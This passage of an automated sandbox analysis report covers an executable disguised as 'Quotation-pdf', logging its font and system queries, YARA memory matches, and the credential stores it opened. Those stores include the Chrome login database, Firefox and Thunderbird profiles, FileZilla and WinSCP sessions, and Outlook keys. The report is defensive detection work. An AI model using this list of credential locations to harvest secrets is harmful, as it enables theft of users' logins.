                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation-pdf______________________________________.exe.3e9ccc0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.276657553.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.272600476.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.273276153.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.273651203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.272994936.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.276792797.0000000003E85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 4400, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: Yara matchFile source: 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation-pdf______________________________________.exe.3e9ccc0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.276657553.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
